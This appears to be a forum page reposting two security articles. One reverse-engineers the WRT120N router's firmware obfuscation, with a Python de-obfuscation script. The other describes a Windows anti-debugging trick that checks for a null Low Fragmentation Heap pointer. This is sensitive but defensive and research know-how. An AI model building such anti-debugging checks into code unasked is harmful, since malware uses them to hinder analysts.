    ======================
    [WG7005G11-LF-88 Boot]:

The most interesting part of the bootloader, of course, is the code that loads the obfuscated firmware image into memory.

Obfuscation Analysis

De-obfuscation is performed by the load_os function, which is passed a pointer to the obfuscated image as well as an address where the image should be copied into memory:

The de-obfuscation routine inside load_os is not complicated:

(image: De-obfuscation routine)

Basically, if the firmware image starts with the bytes 04 01 09 20 (which our obfuscated firmware image does), it enters the de-obfuscation routine which:

    1. Swaps the two 32-byte blocks of data at offsets 0x04 and 0x68.
    2. Nibble-swaps the first 32 bytes starting at offset 0x04.
    3. Byte-swaps each of the adjacent 32 bytes starting at offset 0x04.

At this point, the data at offset 0x04 contains a valid LZMA header, which is then decompressed.

Implementing a de-obfuscation tool was trivial, and the WRT120N firmware can now be de-obfuscated and de-compressed:

    $ ./wrt120n ./firmware/FW_WRT120N_1.0.07.002_US.bin ./deobfuscated.bin
    Doing block swap...
    Doing nibble-swap...
    Doing byte-swap...
    Saving data to ./deobfuscated.bin...
    Done!

(image: Analysis of de-obfuscated firmware)

The de-obfuscation utility can be downloaded here for those interested.

Sursa: Reversing the WRT120N's Firmware Obfuscation - /dev/ttyS0
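A Python re-implementation of the three de-obfuscation steps described in the post above, added here as an example; it is not the author's wrt120n tool and was not taken from the original post. The 04 01 09 20 marker, the 0x04 and 0x68 offsets and the 32-byte block size come from the post; everything else (the inverse transform, the header parser, the sample image built from a constructed pseudo-random payload) is assumed so the script runs offline.

```python
import lzma, struct

MAGIC = b"\x04\x01\x09\x20"           # marker checked by load_os (from the post)
OFF_A, OFF_B, BLOCK = 0x04, 0x68, 32  # the two swapped 32-byte blocks (from the post)

def _block_swap(buf):
    # step 1: exchange the 32-byte blocks at 0x04 and 0x68
    a, b = buf[OFF_A:OFF_A + BLOCK], buf[OFF_B:OFF_B + BLOCK]
    buf[OFF_A:OFF_A + BLOCK], buf[OFF_B:OFF_B + BLOCK] = b, a

def _nibble_and_pair_swap(buf):
    # steps 2 and 3; both are involutions and commute, so one helper serves both directions
    for i in range(OFF_A, OFF_A + BLOCK):
        buf[i] = ((buf[i] << 4) | (buf[i] >> 4)) & 0xFF  # nibble-swap
    for i in range(OFF_A, OFF_A + BLOCK, 2):
        buf[i], buf[i + 1] = buf[i + 1], buf[i]         # adjacent byte-swap

def deobfuscate(image: bytes) -> bytes:
    """Undo the obfuscation; returns the LZMA stream that starts at 0x04."""
    if image[:4] != MAGIC or len(image) < OFF_B + BLOCK:
        raise ValueError("not an obfuscated WRT120N image")
    buf = bytearray(image)
    _block_swap(buf)
    _nibble_and_pair_swap(buf)
    return bytes(buf[OFF_A:])

def obfuscate(stream: bytes) -> bytes:
    """Inverse transform (same steps, reverse order); stream must be >= 132 bytes."""
    buf = bytearray(MAGIC + stream)
    _nibble_and_pair_swap(buf)
    _block_swap(buf)
    return bytes(buf)

def lzma_header(stream: bytes) -> dict:
    """Parse the 13-byte LZMA-alone header expected at 0x04 after step 3."""
    props, dict_size, usize = struct.unpack("<BIQ", stream[:13])
    if props >= 9 * 5 * 5:                            # lc < 9, lp < 5, pb < 5
        raise ValueError("invalid LZMA properties byte: %#x" % props)
    return {"props": props, "dict_size": dict_size, "uncompressed_size": usize}

def recover(image: bytes) -> bytes:
    # de-obfuscate and decompress in one go
    return lzma.decompress(deobfuscate(image), format=lzma.FORMAT_ALONE)

def sample_image(n: int = 512) -> tuple:
    """Constructed sample: LCG pseudo-random (incompressible) payload, compressed then obfuscated."""
    x, payload = 0x12345678, bytearray()
    for _ in range(n):
        x = (1103515245 * x + 12345) & 0xFFFFFFFF
        payload.append((x >> 16) & 0xFF)
    stream = lzma.compress(bytes(payload), format=lzma.FORMAT_ALONE)
    return bytes(payload), obfuscate(stream)
```

Running deobfuscate on a real image and then lzma_header on the result is the quick sanity check: a properties byte below 225 and a plausible dictionary size at offset 0x04 confirm that all three steps were applied in the right order.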
-
Anti-Debugging trick : Checking for the Low Fragmentation Heap

Hi everyone, I'll introduce you today an anti-debugging trick, the idea of which came across my mind while debugging the Windows heap. I don't know if it was used before anywhere, but here I am showing it today.

Check the C/C++ source code : [C++] LFH anti-debugging trick - Pastebin.com

Short introduction to the Windows front end allocator :

First of all let me define what a LFH (low fragmentation heap) is : the LFH was introduced in Windows XP and Windows Server 2003, but it wasn't used as the default front end allocator until Windows Vista. The default front end allocator was the lookaside lists (LAL); each of these 2 is a singly linked list with 128 entries. The LFH, as its name describes, is implemented to guarantee that heap fragmentation will be reduced, and it's strongly recommended for applications that allocate a big number of small size blocks. When the LFH is created first, predetermined sizes of memory will be allocated and put into buckets (LFH entries); when the application calls for an allocation the LFH will provide the smallest available block to satisfy the allocation, otherwise the request will be passed to the heap manager and then to the FreeLists (check the explanation later).

When LAL is used as a front end allocator, a block won't reside in one of its lists until it was allocated either from the FreeLists or by committing memory, and then freed. All that won't apply until a list of the lookaside table can handle the freed block; otherwise it will be passed to the heap manager to perform coalescing if two adjacent blocks are free, change bitmap values, invalidate the coalesced block entry, then insert the coalesced block into its valid list in the FreeLists. If no block coalescing is possible the block is inserted directly in the FreeLists.

Anti-Debugging Trick :

I noticed that when the executable is run under a debugger no Low Fragmentation Heap (LFH) is created for it, so the pointer to the LFH equals NULL. So we'll just have to check if the pointer to the LFH is null to detect if the process was created inside a debugger. I tried afterwards to run the process outside the debugger and then attach to it, and I noticed that a LFH is created for the heap and the pointer to the LFH is valid. The pointer to the LFH is located at "heap_handle+0xd4" under Windows 7 for 32-bit executables and at "heap_handle+0x178" for 64-bit executables.

I attached the debugger to the process :

    0:001> dt _HEAP 00460000
    ntdll!_HEAP
       +0x000 Entry              : _HEAP_ENTRY
       +0x008 SegmentSignature   : 0xffeeffee
       +0x00c SegmentFlags       : 0
       [...]
       +0x0d0 CommitRoutine      : 0x5b16148e
       +0x0d4 FrontEndHeap       : 0x00468cf0 Void   <- Pointer to the FEA
       +0x0d8 FrontHeapLockCount : 0
       +0x0da FrontEndHeapType   : 0x2                <- Type : LFH
       +0x0dc Counters           : _HEAP_COUNTERS
       +0x130 TuningParameters   : _HEAP_TUNING_PARAMETERS

When running the process from the debugger the LFH won't be enabled :

    0:001> dt _HEAP 00320000
    ntdll!_HEAP
       +0x000 Entry              : _HEAP_ENTRY
       +0x008 SegmentSignature   : 0xffeeffee
       +0x00c SegmentFlags       : 0
       [...]
       +0x0cc LockVariable       : 0x00320138 _HEAP_LOCK
       +0x0d0 CommitRoutine      : 0x6d58ec0e long +6d58ec0e
       +0x0d4 FrontEndHeap       : (null)
       +0x0d8 FrontHeapLockCount : 0
       +0x0da FrontEndHeapType   : 0
       +0x0dc Counters           : _HEAP_COUNTERS
       +0x130 TuningParameters   : _HEAP_TUNING_PARAMETERS

Remember that the LFH isn't used by default until Windows Vista and later versions, so to implement the anti-debugging technique under Windows XP we'll need to enable the LFH, as it's not used by default. To do so you'll simply need to call HeapSetInformation with the HEAP_INFORMATION_CLASS set to 0 and with the pointer to the information buffer pointing to 0x2, which will enable the LFH for the heap passed as the first argument.

A simple way to bypass this technique is simply by attaching the debugger to the application instead of running it from a debugger.

More details on the LFH : here

Thanks for your time,
Souhail Hammou.

Sursa: Anti-Debugging trick : Checking for the Low Fragmentation Heap - ITSecurity.ma - Information Security and Ethical Hacking Community